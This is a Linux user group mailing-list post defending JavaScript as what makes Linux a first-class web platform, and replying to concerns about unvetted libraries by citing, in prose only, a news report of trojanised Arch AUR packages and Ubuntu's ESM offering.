[GoLUG] JS allows Linux to be a first class citizen on the internet.

[Ron]

TL;DR - Sorry, I rambled a bit.

JS is okay - safe, fast, powerful, and has amazing development environments.

And, it allows Linux desktops to be first class citizens on the internet 
because applications can be delivered in a browser instead of Youtube.exe.


That is good. No more hacking Wine to get i.e. Jitsi.exe to run.



Barry Fishman wrote on 2025-08-22 12:13:

>>> Couldn't independently reviewed repositories exist, to people 
>>> building websites could have some validation that the software 
>>> they use has had at least some vetting?
>> 
>> Sure, but who's going to pay for that?
> 
> Who is paying for all the damage that is being done to sites that 
> have been burned by JS's lack of validation.

What damage? It's not like sites are going offline frequently. I can't
remember the last time a site I frequently visit was offline, never mind
due to JS.

Anyway, site owners are responsible for their sites unless they're
attacked, then the hackers are responsible (due diligence required by
owners, etc.)




> As long as we refuse to deal with actually solving problems, rather 
> than by passing the responsibility around, things are just going to 
> get worse and more expensive for everyone.  We know the answer to 
> your question. We just refuse to hear it.

I think I agree with what you're saying - unvetted libraries are problems.

Reinventing the wheel is also a problem.

A balance is needed and I am not sure what that is.

Only use libraries from reputable sources?

I personally am very hesitant to include any old node package unless 
it's widely used for that reason.



> At least under Linux, most users of these packages get them though 
> there OS vendor

Yup, it's been remarkably successful.

Hang on, breaking news... A distro's repos have been distributing
malware written in Python in July 2025:

> Arch AUR Under Fire Once More as Malware Resurfaces
> 
> Just ten days after a previous incident, malware with a Remote 
> Access Trojan has once again been discovered in Arch Linux AUR 
> packages.
> 
> Just ten days ago, a few software packages in the AUR were found to 
> contain a Remote Access Trojan (RAT), hidden in packages tied to 
> some of the most popular web browsers. Of course, the AUR team
> acted quickly and pulled them right away. But now, here we are again—
> it’s happened all over.
> 
> before Chrome even starts, the script runs a python command that 
> pulls in an external resource. That resource then downloads and 
> launches malicious software every single time you start Chrome.

https://linuxiac.com/arch-aur-under-fire-once-more-as-malware-resurfaces/

The Linux repo method has been very successful, despite this story
quoted above from less than a month ago.


Now, to be fair, AUR, like Ubuntu / Debian(?) multiverse repo are *not*
curated.

Indeed, Canonical has a recent plan (ESM) to provide curated multiverse
repository packages, requires an account, gives multiple free hosts for
home users and small businesses but the big guys need to pay for it.

> Ubuntu ESM is an offering from Canonical... When an Ubuntu release 
> reaches the end of its standard support cycle, it no longer receives 
> regular security updates. Ubuntu ESM fills this gap by providing 
> security updates for critical and important CVE (Common 
> Vulnerabilities and Exposures) issues for an additional period.

https://linuxvox.com/blog/ubuntu-esm/

Users freaked the F right out about that, of course. They didn't want to 
upgrade, didn't want to sign up for a free account to get curated *old* 
versions of the software they get for free.






> Why this is such a problem with JS is because the code actually 
> being used on internet sites is not visible, or how often it is 
> updated.

JS code can be de-minified (if it weren't minified then people would 
complain it's too big).

Web sites tend to / can update more frequently than most Linux distros.

But again, it's pretty well sandboxed, and while a cryto-miner would 
suck, closing the tab solves the that problem.


> Each site is managed by a small team of overworked 
> developers, who are evaluated on how quickly they get things 
> implemented and not how they get it done.

That sounds like every commercial development process, while single out 
JS developers?



> What do you expect?
A fair & reasonable comparison between what JS can deliver vs its security.

If JS weren't as powerful (and fast) as it is, we'd all be running 
jitsi.exe in Wine and trying infinite hacks to get the most basic things 
working. Remember those days?


Linux is a first class citizen on the internet *because of JS*.


No more "works best in IE6" at banking web sites, nor anywhere else 
(okay, now Chrome monopoly is bringing that back a bit and I hate it).

Almost all modern services are available in a browser and fully 
accessible on Linux or even on mobile.

Without JS, that would not happen.

Any discussion of alternate languages is mostly like fantasy sportsball 
teams - a waste of time. It may not have been the 100% best choice but 
it does a good job now. There are countless examples of not-best-thing 
winning (VHS, etc ad nauseam).


And tech sites with billions of users are not falling over every month 
due to JS. Not every year. Not really ever.


The tools (ReactJS, node, Angular, ...) are pretty darned nice to work 
with, and ReactJS is pretty strict about not allowing Bad Code and 
enforcing web standards on developers.